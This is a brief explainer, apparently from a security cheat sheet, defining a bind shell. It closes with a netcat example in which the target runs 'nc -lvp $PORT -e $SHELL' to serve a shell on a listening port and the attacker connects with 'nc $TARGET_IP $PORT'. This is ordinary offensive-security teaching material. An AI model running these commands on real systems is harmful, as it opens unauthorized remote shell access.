A bind shell is a shell connection initiated by the attacker.

  • The target machine listens on a local port, serving interactive shells.
  • The attacker connects to that port to access a shell.

TL;DR

Local host connects to a remote host to get a shell.

Example:

# Target
nc -lvp $PORT -e $SHELL
 
# Attacker
nc $TARGET_IP $PORT